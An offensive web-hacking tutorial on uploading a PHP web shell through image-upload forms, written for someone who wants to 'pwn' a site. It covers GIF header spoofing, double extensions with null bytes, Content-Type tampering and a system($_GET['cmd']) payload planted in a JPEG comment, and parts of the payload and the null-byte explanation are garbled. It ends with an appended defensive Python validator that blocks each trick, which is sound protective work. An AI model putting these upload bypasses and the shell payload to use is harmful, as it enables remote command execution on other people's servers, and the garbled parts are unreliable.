This is a tutorial on uploading a shell by bypassing an image upload script!
So someone you want to pwn has got a nice little option on their website to upload an image. Instead we're going to try to upload some PHP code so we can eventually own the box.
The following are ways to do this:
First, just try to upload the shell. If this doesn't work, add GIF89a; to the top of your shell.php. Example:
GIF89a;
Depending on what kind of file validation they are using, this may fool the server into thinking it's an image: when it reads the file it finds the GIF header and assumes it is safe because it's an image.
The next way is to rename your shell to shell.php.jpg and try to upload it. This works because there is a null byte in the name, and the server should drop it and anything after it, but when you upload, the check reads it as a .jpg and not a .php.
Another way you can fool the web server into thinking you're uploading an image instead of a PHP shell is to get Firefox and install the Tamper Data add-on, then click Start Tamper and upload your PHP shell, then tamper the data and change the Content-Type from 'application/octet-stream' to 'image/jpeg'.
^ self explanatory.
The final way I'm going to discuss is somewhat good.
Find yourself a copy of edjpgcom.exe
"edjpgcom is a free Windows application that allows you to change (or add) a JPEG comment in a JPEG file."
Usage:
--
edjpgcom "filename.jpg"
Now add this to the JPG comment, since you won't be able to drop a whole shell in there due to size limits etc.
";
system($_GET['cmd']);
echo "
"; ?> Now rename your JPG to .php and upload it. This works because the JPEG and all its attributes are still intact, so it looks like a normal JPG to the server. You can try to combine these techniques.
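Added here as the defender-side counterpart to the tricks above (example code, not part of the original tutorial): a Python upload validator that ignores the client-supplied Content-Type, rejects NUL bytes in the filename, whitelists only the final extension, checks the magic bytes, strips the JPEG COM and APPn segments where a comment editor plants its payload, and stores the file under a server-generated name. It assumes Python 3 with the standard library only; the sample JPEG bytes and the function names are constructed for this example.

```python
import secrets
# Whitelisted extensions and the magic bytes each must start with.
MAGIC = {"jpg": b"\xff\xd8\xff", "jpeg": b"\xff\xd8\xff",
         "png": b"\x89PNG\r\n\x1a\n", "gif": b"GIF8"}
SOS, COM = 0xDA, 0xFE  # JPEG start-of-scan and comment markers

def strip_jpeg_metadata(data: bytes) -> bytes:
    """Drop COM (FFFE) and APPn (FFE0-FFEF) segments ahead of the scan data."""
    out, pos = bytearray(data[:2]), 2  # keep SOI
    while pos + 4 <= len(data) and data[pos] == 0xFF:
        marker = data[pos + 1]
        if marker == SOS:  # entropy-coded data follows; copy the rest unchanged
            return bytes(out + data[pos:])
        seg_len = int.from_bytes(data[pos + 2:pos + 4], "big")
        segment = data[pos:pos + 2 + seg_len]
        if len(segment) != 2 + seg_len:
            raise ValueError("truncated JPEG segment")
        if marker != COM and not 0xE0 <= marker <= 0xEF:
            out += segment  # keep DQT, SOF, DHT and friends
        pos += 2 + seg_len
    raise ValueError("no SOS marker: not a well-formed JPEG")

def validate_upload(filename: str, client_content_type: str, data: bytes):
    """Return (server_chosen_name, sanitized_bytes) or raise ValueError."""
    del client_content_type  # attacker-controlled header; never trust it
    if "\x00" in filename:
        raise ValueError("NUL byte in filename")
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    if ext not in MAGIC:  # shell.php and friends fail here
        raise ValueError(f"extension {ext!r} not allowed")
    if not data.startswith(MAGIC[ext]):  # a GIF89a; prefix does not make a JPEG
        raise ValueError("content does not match the declared image type")
    if ext in ("jpg", "jpeg"):
        data = strip_jpeg_metadata(data)  # PNG/GIF: re-encode with an image library
    # Name is generated server-side, so shell.php.jpg never reaches disk under that name.
    return f"{secrets.token_hex(16)}.{ext}", data

def is_accepted(filename: str, client_content_type: str, data: bytes) -> bool:
    try:
        validate_upload(filename, client_content_type, data)
        return True
    except ValueError:
        return False

def _seg(marker: int, payload: bytes) -> bytes:
    return b"\xff" + bytes([marker]) + (len(payload) + 2).to_bytes(2, "big") + payload

# Constructed sample: SOI, APP0, planted COM, DQT, SOS, EOI (not a decodable picture).
SAMPLE_JPEG = (b"\xff\xd8" + _seg(0xE0, b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00")
               + _seg(COM, b"<?php /* planted comment */ ?>") + _seg(0xDB, bytes(65))
               + b"\xff\xda\x00\x08\x01\x01\x00\x00\x3f\x00\x12\x34\xff\xd9")
```

Store the returned bytes outside the web root or in a directory with no script handler; the sanitized name alone does not help if the upload directory still executes PHP.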